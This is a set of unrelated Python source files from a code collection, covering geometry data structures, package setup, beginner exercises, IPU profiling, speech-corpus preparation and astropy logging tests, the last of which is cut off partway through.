t3 = mgr.And(mgr.And(x8,x9), mgr.And(x10,x11))
f = mgr.And(mgr.And(t1,t2),t3)
output = repycudd.DdArray(mgr, 1)
output.Push(mgr.BddToAdd(f))
mgr.DumpDotArray(output, 'testfile.dot')
var_dict = bidict({"x0" : "0", "x1" : "1", "x2" : "2", "x3" : "3", "x4" : "4", "x5" : "5", "x6" : "6", "x7" : "7", "x8" : "8", "x9" : "9", "x10" : "10", "x11" : "11"})#var_dict = {"0" : "x0", "1" : "x1", "2" : "x2", "3" : "x3", "4" : "x4", "5" : "x5", "6" : "x6", "7" : "x7", "8" : "x8", "9" : "x9", "10" : "x10", "11" : "x11"}
sym_dot.sym_dot_manager("testfile.dot", var_dict).add_syms()
|
py | b41510cc8fa445781040bdc67e62d8df9b27697a | """
********************************************************************************
datastructures
********************************************************************************
.. currentmodule:: compas.datastructures
Classes
=======
.. autosummary::
:toctree: generated/
:nosignatures:
Datastructure
Graph
HalfEdge
HalfFace
Mesh
Network
VolMesh
Functions
=========
Network
-------
.. autosummary::
:toctree: generated/
:nosignatures:
network_complement
network_count_crossings
network_disconnected_edges
network_disconnected_nodes
network_embed_in_plane_proxy
network_embed_in_plane
network_explode
network_find_crossings
network_find_cycles
network_is_connected
network_is_crossed
network_is_planar_embedding
network_is_planar
network_is_xy
network_join_edges
network_polylines
network_shortest_path
network_smooth_centroid
network_split_edge
network_transform
network_transformed
.. autosummary::
:toctree: generated/
:nosignatures:
network_adjacency_matrix
network_connectivity_matrix
network_degree_matrix
network_laplacian_matrix
Mesh
----
.. autosummary::
:toctree: generated/
:nosignatures:
mesh_add_vertex_to_face_edge
mesh_bounding_box_xy
mesh_bounding_box
mesh_collapse_edge
mesh_connected_components
mesh_conway_ambo
mesh_conway_bevel
mesh_conway_dual
mesh_conway_expand
mesh_conway_gyro
mesh_conway_join
mesh_conway_kis
mesh_conway_meta
mesh_conway_needle
mesh_conway_ortho
mesh_conway_snub
mesh_conway_truncate
mesh_conway_zip
mesh_delete_duplicate_vertices
mesh_disconnected_faces
mesh_disconnected_vertices
mesh_dual
mesh_explode
mesh_face_adjacency
mesh_flatness
mesh_flip_cycles
mesh_insert_vertex_on_edge
mesh_is_connected
mesh_merge_faces
mesh_offset
mesh_planarize_faces
mesh_quads_to_triangles
mesh_slice_plane
mesh_smooth_area
mesh_smooth_centerofmass
mesh_smooth_centroid
mesh_split_edge
mesh_split_face
mesh_split_strip
mesh_subdivide_catmullclark
mesh_subdivide_corner
mesh_subdivide_doosabin
mesh_subdivide_frames
mesh_subdivide_quad
mesh_subdivide_tri
mesh_subdivide
mesh_substitute_vertex_in_faces
mesh_thicken
mesh_transform
mesh_transformed
mesh_unify_cycles
mesh_unweld_edges
mesh_unweld_vertices
mesh_weld
meshes_join_and_weld
meshes_join
trimesh_collapse_edge
trimesh_face_circle
trimesh_gaussian_curvature
trimesh_mean_curvature
trimesh_remesh
trimesh_split_edge
trimesh_subdivide_loop
trimesh_swap_edge
.. autosummary::
:toctree: generated/
:nosignatures:
mesh_adjacency_matrix
mesh_connectivity_matrix
mesh_contours_numpy
mesh_degree_matrix
mesh_face_matrix
mesh_geodesic_distances_numpy
mesh_isolines_numpy
mesh_laplacian_matrix
mesh_oriented_bounding_box_numpy
mesh_oriented_bounding_box_xy_numpy
mesh_transform_numpy
mesh_transformed_numpy
trimesh_cotangent_laplacian_matrix
trimesh_descent
trimesh_pull_points_numpy
trimesh_samplepoints_numpy
trimesh_smooth_laplacian_cotangent
trimesh_vertexarea_matrix
VolMesh
-------
.. autosummary::
:toctree: generated/
:nosignatures:
volmesh_bounding_box
volmesh_transform
volmesh_transformed
"""
from __future__ import absolute_import
import compas
from .datastructure import Datastructure
from .graph import (
Graph
)
from .network import (
Network,
network_complement,
network_count_crossings,
network_disconnected_edges,
network_disconnected_nodes,
network_embed_in_plane_proxy,
network_embed_in_plane,
network_explode,
network_find_crossings,
network_find_cycles,
network_is_connected,
network_is_crossed,
network_is_planar_embedding,
network_is_planar,
network_is_xy,
network_join_edges,
network_polylines,
network_shortest_path,
network_smooth_centroid,
network_split_edge,
network_transform,
network_transformed,
)
from .halfedge import (
HalfEdge
)
from .mesh import (
Mesh,
mesh_add_vertex_to_face_edge,
mesh_bounding_box_xy,
mesh_bounding_box,
mesh_collapse_edge,
mesh_connected_components,
mesh_conway_ambo,
mesh_conway_bevel,
mesh_conway_dual,
mesh_conway_expand,
mesh_conway_gyro,
mesh_conway_join,
mesh_conway_kis,
mesh_conway_meta,
mesh_conway_needle,
mesh_conway_ortho,
mesh_conway_snub,
mesh_conway_truncate,
mesh_conway_zip,
mesh_delete_duplicate_vertices,
mesh_disconnected_faces,
mesh_disconnected_vertices,
mesh_dual,
mesh_explode,
mesh_face_adjacency,
mesh_flatness,
mesh_flip_cycles,
mesh_insert_vertex_on_edge,
mesh_is_connected,
mesh_merge_faces,
mesh_offset,
mesh_planarize_faces,
mesh_quads_to_triangles,
mesh_slice_plane,
mesh_smooth_area,
mesh_smooth_centerofmass,
mesh_smooth_centroid,
mesh_split_edge,
mesh_split_face,
mesh_split_strip,
mesh_subdivide_catmullclark,
mesh_subdivide_corner,
mesh_subdivide_doosabin,
mesh_subdivide_frames,
mesh_subdivide_quad,
mesh_subdivide_tri,
mesh_subdivide,
mesh_substitute_vertex_in_faces,
mesh_thicken,
mesh_transform,
mesh_transformed,
mesh_unify_cycles,
mesh_unweld_edges,
mesh_unweld_vertices,
mesh_weld,
meshes_join_and_weld,
meshes_join,
trimesh_collapse_edge,
trimesh_face_circle,
trimesh_gaussian_curvature,
trimesh_mean_curvature,
trimesh_remesh,
trimesh_split_edge,
trimesh_subdivide_loop,
trimesh_swap_edge,
)
from .halfface import (
HalfFace
)
from .volmesh import (
VolMesh,
volmesh_bounding_box,
volmesh_transform,
volmesh_transformed
)
if not compas.IPY:
from .network import (
network_adjacency_matrix,
network_connectivity_matrix,
network_degree_matrix,
network_laplacian_matrix,
)
from .mesh import (
mesh_adjacency_matrix,
mesh_connectivity_matrix,
mesh_contours_numpy,
mesh_degree_matrix,
mesh_face_matrix,
mesh_geodesic_distances_numpy,
mesh_isolines_numpy,
mesh_laplacian_matrix,
mesh_oriented_bounding_box_numpy,
mesh_oriented_bounding_box_xy_numpy,
mesh_transform_numpy,
mesh_transformed_numpy,
trimesh_cotangent_laplacian_matrix,
trimesh_descent,
trimesh_pull_points_numpy,
trimesh_samplepoints_numpy,
trimesh_smooth_laplacian_cotangent,
trimesh_vertexarea_matrix,
)
BaseNetwork = Network
BaseMesh = Mesh
BaseVolMesh = VolMesh
__all__ = [
'Datastructure',
# Graphs
'Graph',
# Networks
'BaseNetwork',
'Network',
'network_complement',
'network_count_crossings',
'network_disconnected_edges',
'network_disconnected_nodes',
'network_embed_in_plane_proxy',
'network_embed_in_plane',
'network_explode',
'network_find_crossings',
'network_find_cycles',
'network_is_connected',
'network_is_crossed',
'network_is_planar_embedding',
'network_is_planar',
'network_is_xy',
'network_join_edges',
'network_polylines',
'network_shortest_path',
'network_smooth_centroid',
'network_split_edge',
'network_transform',
'network_transformed',
# HalfEdge
'HalfEdge',
# Meshes
'BaseMesh',
'Mesh',
'mesh_add_vertex_to_face_edge',
'mesh_bounding_box_xy',
'mesh_bounding_box',
'mesh_collapse_edge',
'mesh_connected_components',
'mesh_conway_ambo',
'mesh_conway_bevel',
'mesh_conway_dual',
'mesh_conway_expand',
'mesh_conway_gyro',
'mesh_conway_join',
'mesh_conway_kis',
'mesh_conway_meta',
'mesh_conway_needle',
'mesh_conway_ortho',
'mesh_conway_snub',
'mesh_conway_truncate',
'mesh_conway_zip',
'mesh_delete_duplicate_vertices',
'mesh_disconnected_faces',
'mesh_disconnected_vertices',
'mesh_dual',
'mesh_explode',
'mesh_face_adjacency',
'mesh_flatness',
'mesh_flip_cycles',
'mesh_insert_vertex_on_edge',
'mesh_is_connected',
'mesh_merge_faces',
'mesh_offset',
'mesh_planarize_faces',
'mesh_quads_to_triangles',
'mesh_slice_plane',
'mesh_smooth_area',
'mesh_smooth_centerofmass',
'mesh_smooth_centroid',
'mesh_split_edge',
'mesh_split_face',
'mesh_split_strip',
'mesh_subdivide_catmullclark',
'mesh_subdivide_corner',
'mesh_subdivide_doosabin',
'mesh_subdivide_frames',
'mesh_subdivide_quad',
'mesh_subdivide_tri',
'mesh_subdivide',
'mesh_substitute_vertex_in_faces',
'mesh_thicken',
'mesh_transform',
'mesh_transformed',
'mesh_unify_cycles',
'mesh_unweld_edges',
'mesh_unweld_vertices',
'mesh_weld',
'meshes_join_and_weld',
'meshes_join',
'trimesh_collapse_edge',
'trimesh_face_circle',
'trimesh_gaussian_curvature',
'trimesh_mean_curvature',
'trimesh_remesh',
'trimesh_split_edge',
'trimesh_subdivide_loop',
'trimesh_swap_edge',
# HalfFace
'HalfFace',
# Volumetric Meshes
'BaseVolMesh',
'VolMesh',
'volmesh_bounding_box',
'volmesh_transform',
'volmesh_transformed',
]
if not compas.IPY:
__all__ += [
# Networks
'network_adjacency_matrix',
'network_connectivity_matrix',
'network_degree_matrix',
'network_laplacian_matrix',
# Meshes
'mesh_adjacency_matrix',
'mesh_connectivity_matrix',
'mesh_contours_numpy',
'mesh_degree_matrix',
'mesh_face_matrix',
'mesh_geodesic_distances_numpy',
'mesh_isolines_numpy',
'mesh_laplacian_matrix',
'mesh_oriented_bounding_box_numpy',
'mesh_oriented_bounding_box_xy_numpy',
'mesh_transform_numpy',
'mesh_transformed_numpy',
'trimesh_cotangent_laplacian_matrix',
'trimesh_descent',
'trimesh_pull_points_numpy',
'trimesh_samplepoints_numpy',
'trimesh_smooth_laplacian_cotangent',
'trimesh_vertexarea_matrix',
]
|
py | b415142cf112b9eae40d74b9083d6f20006407e0 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
REQUIRED_PACKAGES = [
# 'tensorflow>=1.4.0,<=1.12.0',
'gensim==3.6.0',
'networkx==2.1',
'joblib==0.13.0',
'fastdtw==0.2.0',
'tqdm',
'numpy',
'scikit-learn',
'pandas',
'matplotlib',
]
setuptools.setup(
name="ge",
version="0.0.0",
author="Weichen Shen",
author_email="[email protected]",
url="https://github.com/shenweichen/GraphEmbedding",
packages=setuptools.find_packages(exclude=[]),
python_requires='>=3.4', # 3.4.6
install_requires=REQUIRED_PACKAGES,
extras_require={
"cpu": ['tensorflow>=1.4.0,!=1.7.*,!=1.8.*'],
"gpu": ['tensorflow-gpu>=1.4.0,!=1.7.*,!=1.8.*'],
},
entry_points={
},
license="MIT license",
)
|
py | b41514fef0e3636e846cf22045bcfc59266a150c | '''
#_*_coding:utf8-
print('222222')
a = raw_input('>>')
print(a)
# python day03.py >test.txt
# python day03.py <test.txt
'''
'''
a = 'abced'
i=0
while i<len(a):
print(a[i])
i=i+1
'''
'''
n =eval(raw_input(":"))
m= n
while n!=0:
n=eval(raw_input(":"))
if n>m:
m=n
print(m)
print(n)
'''
'''
import random
a=random.randint(0,10)
b=eval(raw_input("enter a between 0 and 10 number:"))
if b==a:
print("you are so smart!")
else:
while (b!=a):
if b>a:
print("big number,again")
b=eval(raw_input("enter a between 0 and 10 number:"))
if b<a:
print("small number,again")
b=eval(raw_input("enter a between 0 and 10 number:"))
if b==a:
print("you are so smart")
'''
'''
sum1 = 0
i=0
while(i<1001):
sum1=sum1+i
i=i+1
print(sum1)
'''
'''
s = 0
i = 1
for i in range (1000):
s=s+i
if s>10000:
print(i)
break
'''
'''
for i in range (10):
for j in range (1,i+1):
print ("{}*{}={} ".format(i,j,i*j),end='')
print(" ")
'''
def fun1(n1,n2,n3):
print(n1,n2,n3)
return (n1,n2,n3)
def fun2(n1,n2,n3):
a=n1*n1
b=n2*n2
c=n3*n3
print(a,b,c)
return(a,b,c)
def fun3(a,b,c):
e=(a-b)+(a-c)+(b-c)
print(e)
a,b,c=fun1(1,2,3)
x,y,z=fun2(a,b,c)
fun3(a,b,c)
|
py | b4151691f22b8c707b2dd0d74867f689d2a14302 | DNA = "AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATTAAAAAAAGAGTGTCTGATAGCAGC"
nucleotides = {
"adenine": DNA.count("A"),
"thymine": DNA.count("T"),
"guanine": DNA.count("G"),
"cytosine": DNA.count("C")
}
print(nucleotides)
|
py | b4151793b3d113c55eb4bf097f714c0fa757e341 | from typing import Callable, IO
from .typing import ILoader
class AutoLoader(ILoader):
def read(self, callback: Callable[[IO], any], **kwargs) -> any:
if "sample" in kwargs:
return self.read_sample(callback, **kwargs)
elif "source" in kwargs:
return self.read_file(callback, **kwargs)
else:
            raise RuntimeError('No input data provided. Use keyword "source" or "sample"')
def read_sample(self, callback: Callable[[IO], any], **kwargs) -> any:
return callback(kwargs["sample"])
def read_file(self, callback: Callable[[IO], any], **kwargs) -> any:
with open(kwargs["source"], kwargs.get("mode", "r")) as fd:
return callback(fd)
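# Illustrative usage (hypothetical callback and file name; only the behaviour visible
# in this module is assumed):
#
#   import io, json
#   loader = AutoLoader()
#   data = loader.read(json.load, source="data.json")          # opens and reads a file
#   data = loader.read(json.load, sample=io.StringIO("{}"))    # uses an already-open stream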
|
py | b41518448673761c7d8d2fcec4da55f6f35c6803 | # Copyright 2019 Graphcore Ltd.
import re
import json
from tensorflow.python.ipu import utils
def get_config(report_n=1):
"""Builds ipu_options"""
config = utils.create_ipu_config(
profiling=False,
use_poplar_text_report=False,
report_every_nth_execution=report_n,
)
config = utils.auto_select_ipus(config, [1])
return config
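# Typical use (sketch; assumes the TF 1.x Graphcore utils API imported above, e.g. its
# configure_ipu_system helper):
#
#   cfg = get_config()
#   utils.configure_ipu_system(cfg)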
start_time = 0
def extract_runtimes_from_report(report, display=True):
"""Returns timing information from IpuTraceEvent
report -- Array of text encoded IpuTraceEvent
"""
    if len(report) == 0:
return
# Timings from tf xla event timestamps
from tensorflow.compiler.plugin.poplar.driver.trace_pb2 import IpuTraceEvent
# Retrieve IpuEvents, poplar report and cycles
events = list(map(IpuTraceEvent.FromString, report))
report = utils.extract_all_strings_from_event_trace(report)
    m = list(map(int, re.findall(r"Program cycles\s*:\s*([\d\.]+)", report)))
global start_time
first = start_time == 0
if first:
start_time = events[0].timestamp
events = events[1:]
evt_str = "\nIPU Timings\n"
exec_num = 0
for evt in events:
extra_str = ""
if evt.type == IpuTraceEvent.COMPILE_BEGIN:
continue
elif evt.type == IpuTraceEvent.COMPILE_END:
evt_name = "Compile"
elif evt.type == IpuTraceEvent.HOST_TO_DEVICE_TRANSFER:
evt_name = "Host->Device"
extra_str = "\n Tensors:"
transfered_tensors = json.loads(
evt.data_transfer.data_transfer.decode("utf-8")
)
for t in transfered_tensors["tensors"]:
extra_str += "\n handle: {:>6}, size: {}".format(
t["name"], t["size"]
)
extra_str += "\n Total_size: {}".format(transfered_tensors["total_size"])
elif evt.type == IpuTraceEvent.DEVICE_TO_HOST_TRANSFER:
evt_name = "Device->Host"
extra_str = "\n Tensors:"
transfered_tensors = json.loads(
evt.data_transfer.data_transfer.decode("utf-8")
)
for t in transfered_tensors["tensors"]:
extra_str += "\n handle: {:>6}, size: {}".format(
t["name"], t["size"]
)
extra_str += "\n Total_size: {}".format(transfered_tensors["total_size"])
elif evt.type == IpuTraceEvent.LOAD_ENGINE:
evt_name = "Load engine"
elif evt.type == IpuTraceEvent.EXECUTE:
evt_name = "Execute"
if m and m[exec_num]:
execution_time = float(m[exec_num]) / (
1 * 1000 * 1000 * 1000
) # Implied 1GHz clock speed
extra_str = "\n Execution Time: {:.3g}s".format(execution_time)
extra_str += "\n Streaming Time: {:.3g}s".format(
(evt.timestamp - start_time) - execution_time
)
exec_num += 1
else:
evt_name = "Unknown event"
evt_str += "{:<15s}: {:<8.3g} s {}\n".format(
evt_name, (evt.timestamp - start_time), extra_str
)
start_time = evt.timestamp
# Print Cycle count from poplar report
evt_str += "\nCycle counts on IPU\n"
for execution_num, execution_cycles in enumerate(m):
evt_str += "Execution {} cycles : {}\n".format(execution_num, execution_cycles)
if display:
print(evt_str)
# Write Report to file
if first:
with open("report.txt", "w") as f:
f.write(report)
print("\nWritten to file: report.txt")
|
py | b4151bf9ccdf2a7b4f33213601c4d8d2974a35f9 | def int_to_string(num):
shift = ord('0')
result = []
sign = 1
    # ord('0') is 48; adding it to each digit value yields the matching ASCII character
    if num == 0:
        return "0"
    if num < 0:
sign = -1
num *= -1
while num > 0:
digit = num % 10
res = chr(digit + shift)
result.append(res)
num //= 10
if sign < 0:
result.append("-")
return "".join(result[::-1])
if __name__ == "__main__":
print(int_to_string(123))
print(int_to_string(-67154))
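    # Added sanity check: the hand-rolled conversion should agree with the built-in str()
    assert int_to_string(123) == str(123)
    assert int_to_string(-67154) == str(-67154)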
|
py | b4151dfceddfb4723bcbe47642e4e23ca0f15f73 | #!/usr/bin/env python3
# Copyright 2019 University of Stuttgart (Pavel Denisov)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
import csv
import os
import random
import sys
import subprocess
def get_uttid(wav):
if '/' in wav:
return wav.split('/')[-4] + '_' + wav[-21:-4].replace('/', '')
idir = sys.argv[1]
bad_utts = set()
for filename in ['exclude_df_youtube_1120', 'public_exclude_file_v5']:
with open(idir + '/' + filename + '.csv') as bad_utts_list_file:
bad_utts_list = csv.DictReader(bad_utts_list_file)
for row in bad_utts_list:
bad_utts.add(get_uttid(row['wav']))
subsets = {'train': {}, 'dev': {}, 'test': {}}
words = ''
val_words = set()
for dataset in \
[
# first the validation datasets
'asr_calls_2_val',
'buriy_audiobooks_2_val',
'public_youtube700_val',
# next the training datasets
# (it needs all validation transcripts)
'asr_public_phone_calls_1',
'asr_public_phone_calls_2',
'asr_public_stories_1',
'asr_public_stories_2',
'private_buriy_audiobooks_2',
'public_lecture_1',
'public_series_1',
'public_youtube1120',
'public_youtube1120_hq',
'public_youtube700',
'radio_2',
'ru_RU',
'russian_single',
'tts_russian_addresses_rhvoice_4voices'
]:
with open(idir + '/' + dataset + '.csv') as metafile:
meta = csv.reader(metafile)
for row in meta:
wav = idir + row[1][19:][:-3] + 'mp3'
uttid = get_uttid(wav)
if uttid in bad_utts or not os.path.isfile(wav):
continue
with open(wav[:-3] + 'txt', encoding='utf-8') as text_file:
words = text_file.read().strip().lower()
subset = 'train'
if dataset[-4:] == '_val':
val_words.add(words)
subset = 'test'
elif words in val_words:
continue
if dataset not in subsets[subset]:
subsets[subset][dataset] = []
subsets[subset][dataset].append([uttid, words, wav])
for dataset in subsets['test'].keys():
subsets[dataset] = {'all': subsets['test'][dataset][:]}
for subset in subsets.keys():
if 'all' not in subsets[subset]:
subsets[subset]['all'] = sum(subsets[subset].values(), [])
random.seed(1)
random.shuffle(subsets['train']['all'])
dev_size = min(int(len(subsets['train']['all']) * 0.1), len(subsets['test']['all']))
subsets['dev']['all'] = subsets['train']['all'][:dev_size]
subsets['train']['all'] = subsets['train']['all'][dev_size:]
del subsets['test']
for subset in subsets.keys():
odir = 'data/' + subset
os.makedirs(odir, exist_ok=True)
with open(odir + '/text', 'w', encoding='utf-8') as text, \
open(odir + '/wav.scp', 'w') as wavscp, \
open(odir + '/utt2spk', 'w') as utt2spk:
for utt in subsets[subset]['all']:
[uttid, words, wav] = utt
text.write('{} {}\n'.format(uttid, words))
utt2spk.write('{} {}\n'.format(uttid, uttid))
wavscp.write('{} sox --norm=-1 {} -r 16k -t wav -c 1 -b 16 -e signed - |\n'.format(uttid, wav))
subprocess.call('utils/fix_data_dir.sh {}'.format(odir), shell=True)
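# Hedged usage note (added): the script takes the dataset root directory as its single
# command-line argument (sys.argv[1]) and assumes it is run from a Kaldi/ESPnet-style recipe
# directory, since it shells out to utils/fix_data_dir.sh; the exact invocation is an assumption.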
|
py | b4151f3b9238b28a81c02556329b2e4a00b4fd85 | # Licensed under a 3-clause BSD style license - see LICENSE.rst
import importlib
import sys
import warnings
import logging
import locale
import pytest
from .helper import catch_warnings
from astropy import log
from astropy.logger import LoggingError, conf
from astropy.utils.exceptions import AstropyWarning, AstropyUserWarning
# Save original values of hooks. These are not the system values, but the
# already overwritten values since the logger already gets imported before
# this file gets executed.
_excepthook = sys.__excepthook__
_showwarning = warnings.showwarning
try:
ip = get_ipython()
except NameError:
ip = None
def setup_function(function):
# Reset modules to default
importlib.reload(warnings)
importlib.reload(sys)
# Reset internal original hooks
log._showwarning_orig = None
log._excepthook_orig = None
# Set up the logger
log._set_defaults()
# Reset hooks
if log.warnings_logging_enabled():
log.disable_warnings_logging()
if log.exception_logging_enabled():
log.disable_exception_logging()
teardown_module = setup_function
def test_warnings_logging_disable_no_enable():
with pytest.raises(LoggingError) as e:
log.disable_warnings_logging()
assert e.value.args[0] == 'Warnings logging has not been enabled'
def test_warnings_logging_enable_twice():
log.enable_warnings_logging()
with pytest.raises(LoggingError) as e:
log.enable_warnings_logging()
assert e.value.args[0] == 'Warnings logging has already been enabled'
def test_warnings_logging_overridden():
log.enable_warnings_logging()
warnings.showwarning = lambda: None
with pytest.raises(LoggingError) as e:
log.disable_warnings_logging()
assert e.value.args[0] == 'Cannot disable warnings logging: warnings.showwarning was not set by this logger, or has been overridden'
def test_warnings_logging():
# Without warnings logging
with catch_warnings() as warn_list:
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
assert len(log_list) == 0
assert len(warn_list) == 1
assert warn_list[0].message.args[0] == "This is a warning"
# With warnings logging
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
# With warnings logging (differentiate between Astropy and non-Astropy)
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
warnings.warn("This is another warning, not from Astropy")
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 1
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
assert warn_list[0].message.args[0] == "This is another warning, not from Astropy"
# Without warnings logging
with catch_warnings() as warn_list:
with log.log_to_list() as log_list:
warnings.warn("This is a warning", AstropyUserWarning)
assert len(log_list) == 0
assert len(warn_list) == 1
assert warn_list[0].message.args[0] == "This is a warning"
def test_warnings_logging_with_custom_class():
class CustomAstropyWarningClass(AstropyWarning):
pass
# With warnings logging
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
warnings.warn("This is a warning", CustomAstropyWarningClass)
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
assert log_list[0].message.startswith('CustomAstropyWarningClass: This is a warning')
assert log_list[0].origin == 'astropy.tests.test_logger'
def test_warning_logging_with_io_votable_warning():
from astropy.io.votable.exceptions import W02, vo_warn
with catch_warnings() as warn_list:
log.enable_warnings_logging()
with log.log_to_list() as log_list:
vo_warn(W02, ('a', 'b'))
log.disable_warnings_logging()
assert len(log_list) == 1
assert len(warn_list) == 0
assert log_list[0].levelname == 'WARNING'
x = log_list[0].message.startswith("W02: ?:?:?: W02: a attribute 'b' is "
"invalid. Must be a standard XML id")
assert x
assert log_list[0].origin == 'astropy.tests.test_logger'
def test_import_error_in_warning_logging():
"""
Regression test for https://github.com/astropy/astropy/issues/2671
This test actually puts a goofy fake module into ``sys.modules`` to test
this problem.
"""
class FakeModule:
def __getattr__(self, attr):
raise ImportError('_showwarning should ignore any exceptions '
'here')
log.enable_warnings_logging()
sys.modules['<test fake module>'] = FakeModule()
try:
warnings.showwarning(AstropyWarning('Regression test for #2671'),
AstropyWarning, '<this is only a test>', 1)
finally:
del sys.modules['<test fake module>']
def test_exception_logging_disable_no_enable():
with pytest.raises(LoggingError) as e:
log.disable_exception_logging()
assert e.value.args[0] == 'Exception logging has not been enabled'
def test_exception_logging_enable_twice():
log.enable_exception_logging()
with pytest.raises(LoggingError) as e:
log.enable_exception_logging()
assert e.value.args[0] == 'Exception logging has already been enabled'
# You can't really override the exception handler in IPython this way, so
# this test doesn't really make sense in the IPython context.
@pytest.mark.skipif("ip is not None")
def test_exception_logging_overridden():
log.enable_exception_logging()
sys.excepthook = lambda etype, evalue, tb: None
with pytest.raises(LoggingError) as e:
log.disable_exception_logging()
assert e.value.args[0] == 'Cannot disable exception logging: sys.excepthook was not set by this logger, or has been overridden'
@pytest.mark.xfail("ip is not None")
def test_exception_logging():
# Without exception logging
try:
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 0
# With exception logging
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith('Exception: This is an Exception')
assert log_list[0].origin == 'astropy.tests.test_logger'
# Without exception logging
log.disable_exception_logging()
try:
with log.log_to_list() as log_list:
raise Exception("This is an Exception")
except Exception as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0] == "This is an Exception"
else:
assert False # exception should have been raised
assert len(log_list) == 0
@pytest.mark.xfail("ip is not None")
def test_exception_logging_origin():
# The point here is to get an exception raised from another location
# and make sure the error's origin is reported correctly
from astropy.utils.collections import HomogeneousList
l = HomogeneousList(int)
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
l.append('foo')
except TypeError as exc:
sys.excepthook(*sys.exc_info())
assert exc.args[0].startswith(
"homogeneous list must contain only objects of type ")
else:
assert False
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith(
"TypeError: homogeneous list must contain only objects of type ")
assert log_list[0].origin == 'astropy.utils.collections'
@pytest.mark.skip(reason="Infinite recursion on Python 3.5+, probably a real issue")
#@pytest.mark.xfail("ip is not None")
def test_exception_logging_argless_exception():
"""
Regression test for a crash that occurred on Python 3 when logging an
exception that was instantiated with no arguments (no message, etc.)
Regression test for https://github.com/astropy/astropy/pull/4056
"""
try:
log.enable_exception_logging()
with log.log_to_list() as log_list:
raise Exception()
except Exception as exc:
sys.excepthook(*sys.exc_info())
else:
assert False # exception should have been raised
assert len(log_list) == 1
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message == 'Exception [astropy.tests.test_logger]'
assert log_list[0].origin == 'astropy.tests.test_logger'
@pytest.mark.parametrize(('level'), [None, 'DEBUG', 'INFO', 'WARN', 'ERROR'])
def test_log_to_list(level):
orig_level = log.level
try:
if level is not None:
log.setLevel(level)
with log.log_to_list() as log_list:
log.error("Error message")
log.warning("Warning message")
log.info("Information message")
log.debug("Debug message")
finally:
log.setLevel(orig_level)
if level is None:
# The log level *should* be set to whatever it was in the config
level = conf.log_level
# Check list length
if level == 'DEBUG':
assert len(log_list) == 4
elif level == 'INFO':
assert len(log_list) == 3
elif level == 'WARN':
assert len(log_list) == 2
elif level == 'ERROR':
assert len(log_list) == 1
# Check list content
assert log_list[0].levelname == 'ERROR'
assert log_list[0].message.startswith('Error message')
assert log_list[0].origin == 'astropy.tests.test_logger'
if len(log_list) >= 2:
assert log_list[1].levelname == 'WARNING'
assert log_list[1].message.startswith('Warning message')
assert log_list[1].origin == 'astropy.tests.test_logger'
if len(log_list) >= 3:
assert log_list[2].levelname == 'INFO'
assert log_list[2].message.startswith('Information message')
assert log_list[2].origin == 'astropy.tests.test_logger'
if len(log_list) >= 4:
assert log_list[3].levelname == 'DEBUG'
assert log_list[3].message.startswith('Debug message')
assert log_list[3].origin == 'astropy.tests.test_logger'
def test_log_to_list_level():
with log.log_to_list(filter_level='ERROR') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 1 and log_list[0].levelname == 'ERROR'
def test_log_to_list_origin1():
with log.log_to_list(filter_origin='astropy.tests') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 2
def test_log_to_list_origin2():
with log.log_to_list(filter_origin='astropy.wcs') as log_list:
log.error("Error message")
log.warning("Warning message")
assert len(log_list) == 0
@pytest.mark.parametrize(('level'), [None, 'DEBUG', 'INFO', 'WARN', 'ERROR'])
def test_log_to_file(tmpdir, level):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
orig_level = log.level
try:
if level is not None:
log.setLevel(level)
with log.log_to_file(log_path):
log.error("Error message")
log.warning("Warning message")
log.info("Information message")
log.debug("Debug message")
log_file.close()
finally:
log.setLevel(orig_level)
log_file = local_path.open('rb')
log_entries = log_file.readlines()
log_file.close()
if level is None:
# The log level *should* be set to whatever it was in the config
level = conf.log_level
# Check list length
if level == 'DEBUG':
assert len(log_entries) == 4
elif level == 'INFO':
assert len(log_entries) == 3
elif level == 'WARN':
assert len(log_entries) == 2
elif level == 'ERROR':
assert len(log_entries) == 1
# Check list content
assert eval(log_entries[0].strip())[-3:] == (
'astropy.tests.test_logger', 'ERROR', 'Error message')
if len(log_entries) >= 2:
assert eval(log_entries[1].strip())[-3:] == (
'astropy.tests.test_logger', 'WARNING', 'Warning message')
if len(log_entries) >= 3:
assert eval(log_entries[2].strip())[-3:] == (
'astropy.tests.test_logger', 'INFO', 'Information message')
if len(log_entries) >= 4:
assert eval(log_entries[3].strip())[-3:] == (
'astropy.tests.test_logger', 'DEBUG', 'Debug message')
def test_log_to_file_level(tmpdir):
local_path = tmpdir.join('test.log')
log_file = local_path.open('wb')
log_path = str(local_path.realpath())
